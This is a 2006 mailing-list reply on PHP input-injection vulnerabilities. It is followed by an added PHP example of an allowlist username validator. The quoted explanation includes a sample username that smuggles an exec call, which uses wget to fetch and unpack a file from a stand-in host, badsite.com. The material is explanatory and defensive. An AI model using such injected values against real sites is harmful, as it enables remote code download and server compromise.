[CS-FSLUG] PHP vulnerabilities?
Ed Hurst
ehurst at asisaid.com
Fri Jun 2 09:37:14 CDT 2006
Tim Young wrote:
> There are quite a number of ways to do this sort of thing. Most of the
> time it is a poorly written PHP (or other language) script. The basic
> thing is when you give someone the ability to input something. For
> example, a username.
>
> Instead of having a username "Tim", they use something like:
> "Tim; \"exec('wget http://badsite.com/badfile.tgz; tar -xzf
> badfile.tgz')\""
Excellent explanation! I may never, ever use PHP for anything, but I
understood the concept. Checking input for a valid user name, and
warning new users as they register, is thus a hallmark of having RTFM.
Thanks. I'll be using this the next time I get questions from site admins.
--
Ed Hurst
----------
Bible Application - http://ed.asisaid.com/bible/index.html
Plain & Simple Computer Help - http://ed.asisaid.com/
Mission, Method & Means - http://ed.asisaid.com/blog/
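
The user-name check discussed in this thread, as an added example that is not part of the original messages: an allowlist validator run over a few inputs, including the string quoted from Tim's message. The helper name `validate_username`, the length and character policy, and the sample list are assumptions made for illustration; it needs PHP 8.0 or later.

```php
<?php
declare(strict_types=1);

// Allowlist policy (an assumption for this example): 3 to 32 characters,
// starting with a letter, then letters, digits, underscore or hyphen.
// \A and \z anchor to the true start and end of the string; unlike $,
// \z does not tolerate a trailing newline.
const USERNAME_PATTERN = '/\A[A-Za-z][A-Za-z0-9_-]{2,31}\z/';

/**
 * Hypothetical helper: returns the user name unchanged when it matches
 * the allowlist, or null when it must be rejected.
 */
function validate_username(mixed $input): ?string
{
    // Request parameters can arrive as arrays (user[]=x), so check the type.
    if (!is_string($input)) {
        return null;
    }
    return preg_match(USERNAME_PATTERN, $input) === 1 ? $input : null;
}

// Sample inputs constructed for this example; the second is the string
// quoted in the message above.
$samples = [
    'Tim',
    "Tim; \"exec('wget http://badsite.com/badfile.tgz; tar -xzf badfile.tgz')\"",
    "Tim\n",   // trailing newline
    'ab',      // too short for the assumed policy
    ['Tim'],   // array instead of string
];

foreach ($samples as $raw) {
    $shown = is_string($raw)
        ? json_encode($raw, JSON_UNESCAPED_SLASHES)
        : gettype($raw);
    $name = validate_username($raw);
    if ($name === null) {
        echo "REJECT $shown\n";
        continue;
    }
    // Defence in depth: a validated value is still quoted before it is
    // placed on a command line, and is never passed to eval().
    echo "ACCEPT $shown -> shell argument " . escapeshellarg($name) . "\n";
}
```

Only the first sample is accepted. Rejecting at registration is also the point at which a new user can be told which characters are allowed.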